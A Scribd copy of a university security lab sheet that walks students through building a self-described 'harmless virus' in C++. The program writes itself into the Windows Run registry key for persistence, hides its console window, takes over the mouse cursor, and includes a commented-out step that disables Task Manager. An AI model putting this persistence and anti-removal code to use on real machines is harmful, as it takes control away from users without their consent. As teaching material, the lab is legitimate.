Scribd
Upload
193 views8 pages

Building a Harmless C++ Virus

The document provides instructions for creating a harmless virus in C++ that infects the Windows Registry and causes the mouse to move randomly. It explains how to open the Windows Registry and add a value to run an application automatically on startup. The code provided sets the mouse position randomly in a loop to simulate virus behavior. Additional code is added to hide the console window and register the executable to run automatically on startup by modifying the Windows Registry.

Uploaded by

Edward Lee
Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
193 views8 pages

Building a Harmless C++ Virus

The document provides instructions for creating a harmless virus in C++ that infects the Windows Registry and causes the mouse to move randomly. It explains how to open the Windows Registry and add a value to run an application automatically on startup. The code provided sets the mouse position randomly in a loop to simulate virus behavior. Additional code is added to hide the console window and register the executable to run automatically on startup by modifying the Windows Registry.

Uploaded by

Edward Lee
Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

Page 1 of 8

CO1508 Computer Systems & Security – Week 10


Building your harmless virus in C++ – Part 1 Windows Registry

Summary
You are going to explore Windows Registry and learn how to make an application starts
every time the computer is powered on. After that, you are going to build a C++ programme
that will infect Windows Registry to start every time the machine starts and make the
mouse go crazy. It’s your little harmless virus!

Note
The C++ code in this lab sheet might contains errors and/or bugs. This is done on purpose.
One of the main aims of this practice is getting you to find out solutions and debug your
code carefully. Don’t worry, when you’re stuck, your lab tutor will help.

Activities

1. Windows Registry

From Start menu à Type Run à Enter. In the Run window, type regedit. Click Yes.
As we discussed during the lecture, Windows registry is a central database for system and
software configurations on Windows machine. You’ll learn a trick to start an application
every time the machine is powered on.
Go to the following location:
\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
What can you see there? How many strings are there?

Now, right click in the empty space and choose New à String Value à MyValue. Right click
on MyValue and choose modify (or simply double click on MyValue). In the Value Data field,
put this: “C:\Windows\System32\[Link]” (yes including the double quotations).
Now, restart your machine and watch the result.
If everything works correctly, Paint should start automatically.
Why is this important? Can you think of a good use and a bad use of this feature?

CO1508 Computer Systems and Security, UCLAN – 2019-2020


Page 2 of 8

2. Create Visual Studio C++ Project

Open Visual Studio and create a new “Windows Console Application” under Visual C++
project named “Week10-RegVirus”.

3. Windows Registry API

Registry key values can be edited using regedit, as you already did in section 1. Another way
of editing registry keys is an API system library in Windows called winreg.h
Here, you can find all the functions provided by this library:
[Link]
Examples of these functions are:
RegCloseKey RegOpenKey

RegConnectRegistry RegOpenKeyEx

RegCreateKey RegQueryInfoKey

RegCreateKeyEx RegQueryMultipleValues

You’ve to spend some time reading about these functions and understanding how it works
and why you might need to use them. This is important for your assignment because you
should be able to answer any question about any line of code. This is also important for this
lab sheet so you can fix any bug in the code below.

We’ll do a Hello Registry exercise at the beginning to get you going "
% However, before
$
#
diving into code details, you’ve to remember these steps to change a registry key value
through a C++ programme:
• Open the key you want to edit
• Edit the value
• Close the key (this is very important because otherwise the value won’t be written)

In the code below, I’ll assume that you can refer to the link above (about winreg.h) to
understand registry editing functions. I’ll only explain system functions when necessary.
Again, you’ve to spend some time reading/understanding the main functions in winreg.h.

CO1508 Computer Systems and Security, UCLAN – 2019-2020


Page 3 of 8

4. Windows Registry – Handle to Key (HKEY)

In Section 1, we created a new entry to make Paint starts every time we start the machine.
We’ll do the same now but using C++. Write the following code into your C++ project:
#include "stdafx.h"
#include <iostream>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
using namespace std;

int main()
{
HKEY RunKey;
LPCTSTR valueP = TEXT("CO1508");
char* data = "C:\\WINDOWS\\system32\\[Link]";
if (RegOpenKey(HKEY_CURRENT_USER,
TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\RUN"), &RunKey) !=
ERROR_SUCCESS)
{
cout << "Unable to open registry key. Exit.\n";
return 0;
}

if (RegSetValueEx(RunKey, valueP, 0, REG_SZ, (LPBYTE)data,


strlen(data)*sizeof(TCHAR)) != ERROR_SUCCESS)
{
RegCloseKey(RunKey);
cout << "Unable to set the registry value. Exit.\n";
return 0;
}
else
{
RegCloseKey(RunKey);
cout << "Registry value is successfully set!\n";
MessageBox(NULL, L"You're infected :-) I dare you to restart
your machine!", L"Infection", MB_OKCANCEL);
}
return 0;
}

CO1508 Computer Systems and Security, UCLAN – 2019-2020


Page 4 of 8

Now, build and run. Open the registry again and check the values in Run. Did it work? Do
you see anything strange there? Clearly, the code worked but didn’t set the value correctly.
Try to fix the code. Hint: check the parameters types.

Once it’s fixed, build and run again. It should have the correct value in Run. Once it’s there,
save your work, restart your machine and check if MS paint will start automatically.
If you’re stuck, ask your lab tutor for help. Try to find the solution yourself first!

5. Windows Registry – Crazy Mouse

So far, you learnt how to open a registry key and write a new value in Run. Now, let’s try to
write a programme that will make the mouse go crazy. In the same project, add the
following code to your previous one. Remember, put it before return 0 at the end!
while (1)
{
srand(time(NULL));
POINT point;
GetCursorPos(&point);
for (int i = 0; i < 500000; i++)
{
// set x and y coordinates randomly
point.x = rand() % 2000;
point.y = rand() % 2000;
}
SetCursorPos(point.x, point.y);
}
return 0;

Now, build and run. Click ok when you see the infection message. Now, I dare you to control
your mouse!!! J

Don’t worry, you can press “Alt+Ctrl+Del” to get Windows task manager and kill the exe file
to stop this madness. (Don’t end Visual studio task!) If you can’t control the mouse to get to
Task manager, use Alt+F4 on keyboard to close the console window.

Try to run the code again but this time, use the keyboard to close the console window (use
Alt+F4). It looks that our crazy mouse virus is weak and vulnerable to these two methods!

CO1508 Computer Systems and Security, UCLAN – 2019-2020


Page 5 of 8

(Windows Task Manager or Alt+F4). We’ll learn how to hide the console window, so it’ll be
more difficult to stop it!!! But first, read the explanation of the new functions used above:

• srand(time(NULL)) initialises the pseudo random number generator with a value


time(NULL), which returns the current calendar time from the system.

• POINT this class represents an x-y coordinate point on a two-dimensional integer grid.
• GetCursorPos(&point) retrieves the position of the mouse cursor, in screen

coordinates and point the value in &point.


• SetCursorPos(point.x, point.y) sets the mouse cursor to the specified

coordinates on the screen.

6. Hide the Console Window

Add the following the code in red to your while loop:


while (1)
{
srand(time(NULL));
HWND hwnd = GetConsoleWindow();
POINT point;
GetCursorPos(&point);
ShowWindow(hwnd, SW_HIDE);
for (int i = 0; i < 500000; i++)
{
point.x = rand() % 2000;
point.y = rand() % 2000;
}
SetCursorPos(point.x, point.y);
}

Now, build and run. The console window will disappear. You can use task manger to stop it
by expanding Visual Studio and you’ll find it there [Link] J You might have
to use the keyboard if your mouse is still crazy!

• GetConsoleWindow()retrieves the window handle used by the console associated

with the calling process.

CO1508 Computer Systems and Security, UCLAN – 2019-2020


Page 6 of 8

• showWindow() sets the specified window show state. Check the parameters’ values
here [Link]
showwindow

7. Windows Registry – Register Yourself to Run Every Time

We want to register the exe file of our virus, so it runs every time the machine runs. I’ll post
the full code here so you’ve the full picture now. The code contains all the pieces from all
the sections in this lab sheet.
Note the code in red is the new added pieces to register the exe file into the Run key.

#include "stdafx.h"
#include <iostream>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
using namespace std;

int main()
{
HKEY RunKey, SysKey;
DWORD dwData = 1;
LPCTSTR valueP = TEXT("CO1508");
LPCTSTR valueV = TEXT("Virus");
LPCTSTR data = TEXT("C:\\WINDOWS\\system32\\[Link]");
TCHAR VPath[MAX_PATH + 1];

GetModuleFileName(NULL, VPath, MAX_PATH);

if (RegOpenKey(HKEY_CURRENT_USER,
TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\RUN"), &RunKey) !=
ERROR_SUCCESS)
{
cout << "Unable to open registry key. Exit.\n";
return 0;
}

LONG PaintRun = RegSetValueEx(RunKey, valueP, 0, REG_SZ,


(LPBYTE)data, lstrlen(data) * sizeof(TCHAR));
LONG RegVirusRun = RegSetValueEx(RunKey, valueV, 0, REG_SZ,
(LPBYTE)VPath, lstrlen(VPath) * sizeof(TCHAR));

if (PaintRun || RegVirusRun)
{

CO1508 Computer Systems and Security, UCLAN – 2019-2020


Page 7 of 8

RegCloseKey(RunKey);
cout << "Unable to set the registry value. Exit.\n";
return 0;
}
else
{
RegCloseKey(RunKey);
cout << "Registry value is successfully set!\n";
MessageBox(NULL, L"You're infected :-) I dare you to restart
your machine!", L"Infection", MB_OKCANCEL);
}

/*
LONG openRes =
RegCreateKeyEx(HKEY_CURRENT_USER,L"Software\\Microsoft\\Windows\\Curr
entVersion\\Policies\\System",
0, NULL, REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,
NULL,&SysKey,NULL);

if (openRes)
{
cout << "Error" << openRes << "\n";
return 0;
}

RegSetValueEx(SysKey, L"DisableTaskMgr", 0,
REG_DWORD, (LPBYTE)&dwData, sizeof(DWORD));
RegCloseKey(SysKey);
*/

while (1)
{
srand(time(NULL));
HWND hwnd = GetConsoleWindow();
POINT point;
GetCursorPos(&point);
ShowWindow(hwnd, SW_HIDE);

for (int i = 0; i < 500000; i++)


{
point.x = rand() % 2000;
point.y = rand() % 2000;
}

SetCursorPos(point.x, point.y);
}

return 0;
}

Now, build and run. Restart your machine and see what will happen.

CO1508 Computer Systems and Security, UCLAN – 2019-2020


Page 8 of 8

Back to the code, the only new function in this code is GetModuleFileName(NULL, VPath,
MAX_PATH).
It retrieves the fully qualified path for the file that contains the specified module. The
module must have been loaded by the current process. You can read about the parameters
here: [Link]
getmodulefilenamea
Can you figure out why did we use MAX_PATH? Find the answer.

8. The Assignment – Start now with these tasks

Now, you should be able to start your assignment. You’ve been given the basics to do the
registry virus and manipulate registry values. In the time left in this lab, try to do the
following tasks in C++:
• Find out how to read a key from the registry and display its value on screen
• Find out how to delete a specific registry value or key
• Find out how to access a path on the hard disk and delete that file you found in the
registry key.

Finally, remember that you have to understand every line of code you’re writing. You’ll be
asked during the demo of your assignment. Therefore, don’t just copy/paste stuff.

CO1508 Computer Systems and Security, UCLAN – 2019-2020

Common questions

Powered by AI

The exercise of creating a 'harmless virus' aims to teach students practical skills in C++ programming, debugging, and understanding the Windows API, particularly skills related to registry manipulation and user interface control. These learning objectives are crucial for software engineering students to comprehend how low-level system programming affects operating systems. However, the implications include the necessity of instilling a strong ethical framework to ensure these skills are used responsibly and not for developing malicious software, thus underscoring the dual nature of technical education and ethical responsibility .

Using MAX_PATH in the function GetModuleFileName is significant because it defines the maximum length for a path string: 260 characters on many Windows systems. This constraint is crucial in Windows system programming as it ensures path strings do not exceed the memory allocated for them, which otherwise might lead to buffer overflow vulnerabilities or truncated paths, causing unpredictable program behavior. observing MAX_PATH limits is necessary to maintain system stability and data integrity when handling file paths .

Improperly closing a registry key after modifications in a C++ program can lead to several repercussions, including memory leaks, where resources are not properly released, leaving the system in an inefficient state, or failing to write changes to the registry, which means that changes are not persistent. Ensuring the key is properly closed with RegCloseKey ensures all modifications are committed and system resources are freed, preventing ongoing resource allocation and potential system slowdown. Proper practices thus ensure both program robustness and system stability .

The Windows Registry serves as a centralized hierarchical database that stores low-level settings for the Windows operating system and for applications that choose to use the registry. It is significant because the ability to modify the registry programmatically allows developers to alter system behavior without manual intervention, automate processes, and potentially exploit system vulnerabilities. Programmatically modifying the registry on startup, for instance, enables applications to start automatically every time the computer is powered on, which has both useful applications and security implications .

Error handling is essential when performing registry operations with C++ because it ensures that any failures during operations like opening, modifying, or closing registry keys are caught and handled gracefully. Without proper error handling, a program may crash, leave registry keys in an inconsistent state, or proceed with invalid assumptions, potentially causing system instability or security vulnerabilities. The consequences of neglecting error handling include executing unsafe code paths or corrupting critical system configurations .

Programmatically hiding a console window with functions like ShowWindow affects user experience by obscuring the execution of the software from the user, which can make potentially harmful software more dangerous. It prevents users from seeing indications of program execution, thus impeding their ability to identify and terminate unwanted processes. In terms of security, this tactic increases the software's stealth, making it harder to detect and remove by conventional means, such as Task Manager, thus raising the stakes for malware detection and response measures .

Creating a harmless virus to manipulate cursor position raises ethical concerns about consent, privacy, and misuse. While intended for educational purposes, such software could teach harmful coding practices or be repurposed for malicious intent. Users of the system should be informed and consent to the use, as even harmless pranks can disrupt work, cause data loss, or stress users under specific circumstances. The project could inadvertently highlight security vulnerabilities that less scrupulous individuals might exploit .

In the 'crazy mouse' program, GetConsoleWindow retrieves the handle to the console window used by the program. ShowWindow is then used to hide the console window with the SW_HIDE parameter, making the program invisible to users as it runs in the background. This enhances the stealthiness of the application, preventing users from easily spotting and terminating it through the console window. Such functions can be used to keep programs running unobtrusively, an approach that highlights both strategic programming skills and potential misuse for creating stealthy software .

A C++ program can ensure it runs every time a Windows machine starts by writing an entry to the Windows Registry under the Run key, such as HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, using functions like RegOpenKey and RegSetValueEx. Although this is a powerful feature for deploying necessary utilities, it also poses security risks as malicious programs can exploit it to persist on a system without user consent, potentially leading to system degradation or unauthorized data access .

To change a registry key value using C++, the following steps are essential: 1) Open the registry key you want to edit using functions like RegOpenKey or RegOpenKeyEx; 2) Edit or set the value with functions like RegSetValueEx; 3) Close the registry key using RegCloseKey. Each step is crucial because opening the key grants the necessary permissions to make changes, setting the value updates the registry, and closing the key ensures the changes are written and system resources are freed .

You might also like